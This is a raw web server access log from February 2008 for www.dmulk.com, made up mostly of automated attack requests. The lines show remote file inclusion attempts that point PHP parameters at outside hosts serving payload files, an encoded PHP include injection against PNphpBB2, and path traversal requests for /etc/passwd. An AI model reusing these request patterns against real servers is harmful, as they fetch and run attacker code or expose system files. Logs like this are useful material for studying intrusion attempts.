69.72.161.50 - - [04/Feb/2008:05:29:44 -0800] "GET /logs/access_071230.log//////////?mosConfig_absolute_path=http://203.71.212.3/www/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:29:44 -0800] "GET /logs//////////?mosConfig_absolute_path=http://203.71.212.3/www/d.txt?? HTTP/1.1" 200 33126 "-" "libwww-perl/5.808" "www.dmulk.com"
82.138.45.66 - - [04/Feb/2008:05:31:35 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://webcal.promocall.de//tools/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:32:29 -0800] "GET /logs//mcf.php?content=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:32:29 -0800] "GET //mcf.php?content=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:33:36 -0800] "GET //mcf.php?content=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:33:36 -0800] "GET /logs//mcf.php?content=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:05:33:43 -0800] "GET /logs/access_080106.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [04/Feb/2008:05:33:43 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://AstroIndo.Org/box/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Feb/2008:05:35:08 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.secureonsites.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.161.50 - - [04/Feb/2008:05:35:19 -0800] "GET //mcf.php?content=http://203.71.212.3/www/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.18.175 - - [04/Feb/2008:05:37:18 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [04/Feb/2008:05:37:18 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [04/Feb/2008:05:37:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:37:36 -0800] "GET /logs/access_080105.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:37:36 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:37:36 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Feb/2008:05:37:41 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.138.148.253 - - [04/Feb/2008:05:39:00 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.148.253 - - [04/Feb/2008:05:39:00 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.138.148.253 - - [04/Feb/2008:05:39:01 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.115.189 - - [04/Feb/2008:05:39:39 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.115.189 - - [04/Feb/2008:05:39:39 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.115.189 - - [04/Feb/2008:05:39:39 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:05:39:53 -0800] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
222.234.1.78 - - [04/Feb/2008:05:39:53 -0800] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://geocities.com/putman1207/back.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:40:00 -0800] "GET /logs/access_080105.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.175 - - [04/Feb/2008:05:40:00 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:40:01 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:40:01 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.222.47 - - [04/Feb/2008:05:40:07 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [04/Feb/2008:05:40:08 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [04/Feb/2008:05:40:08 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [04/Feb/2008:05:40:08 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [04/Feb/2008:05:40:08 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [04/Feb/2008:05:40:08 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.103.8.13 - - [04/Feb/2008:05:40:46 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [04/Feb/2008:05:40:46 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [04/Feb/2008:05:40:46 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.93.36.240 - - [04/Feb/2008:05:40:57 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.38.188.164 - - [04/Feb/2008:05:41:09 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.188.164 - - [04/Feb/2008:05:41:09 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.188.164 - - [04/Feb/2008:05:41:10 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.70.34 - - [04/Feb/2008:05:41:21 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.70.34 - - [04/Feb/2008:05:41:21 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.70.34 - - [04/Feb/2008:05:41:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.208.31 - - [04/Feb/2008:05:41:41 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.208.31 - - [04/Feb/2008:05:41:41 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.138.148.253 - - [04/Feb/2008:05:41:41 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.208.31 - - [04/Feb/2008:05:41:41 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.235.84 - - [04/Feb/2008:05:41:44 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.235.84 - - [04/Feb/2008:05:41:45 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.235.84 - - [04/Feb/2008:05:41:45 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.251.129.46 - - [04/Feb/2008:05:42:29 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.251.129.46 - - [04/Feb/2008:05:42:30 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.251.129.46 - - [04/Feb/2008:05:42:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.160.72.103 - - [04/Feb/2008:05:42:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.115.189 - - [04/Feb/2008:05:43:05 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.226.196 - - [04/Feb/2008:05:43:16 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.196 - - [04/Feb/2008:05:43:16 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.196 - - [04/Feb/2008:05:43:16 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.222.47 - - [04/Feb/2008:05:43:28 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.66 - - [04/Feb/2008:05:43:30 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.186.15.66 - - [04/Feb/2008:05:43:39 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.15.66 - - [04/Feb/2008:05:43:44 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.186.15.66 - - [04/Feb/2008:05:43:45 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.217.40 - - [04/Feb/2008:05:44:01 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [04/Feb/2008:05:44:02 -0800] "GET //appserv/main.php?appserv_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.98.217.40 - - [04/Feb/2008:05:44:02 -0800] "GET /logs//appserv/main.php?appserv_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.109.103.205 - - [04/Feb/2008:05:44:02 -0800] "GET /logs/access_080105.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.103.205 - - [04/Feb/2008:05:44:03 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.103.205 - - [04/Feb/2008:05:44:03 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [04/Feb/2008:05:44:12 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:05:44:25 -0800] "GET /logs/access_080106.log//appserv/main.php?appserv_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:05:44:25 -0800] "GET //appserv/main.php?appserv_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:05:44:25 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.188.164 - - [04/Feb/2008:05:44:32 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.70.34 - - [04/Feb/2008:05:44:34 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.215.212 - - [04/Feb/2008:05:44:55 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.235.84 - - [04/Feb/2008:05:46:04 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.208.31 - - [04/Feb/2008:05:46:06 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [04/Feb/2008:05:46:24 -0800] "GET /logs/access_080118.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [04/Feb/2008:05:46:25 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.132.54 - - [04/Feb/2008:05:46:36 -0800] "GET //appserv/main.php?appserv_root=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:49:27 -0800] "GET /logs/access_080107.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:49:27 -0800] "GET /logs/access_080122.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:49:33 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.145.69 - - [04/Feb/2008:05:49:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.171.125.30 - - [04/Feb/2008:05:49:36 -0800] "GET /logs/access_071216.log//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.125.30 - - [04/Feb/2008:05:49:36 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.171.125.30 - - [04/Feb/2008:05:49:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://digitalmediawire.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:49:47 -0800] "GET /logs/access_080123.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [04/Feb/2008:05:49:55 -0800] "GET /presto HTTP/1.1" 301 91 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
217.149.115.250 - - [04/Feb/2008:05:50:00 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
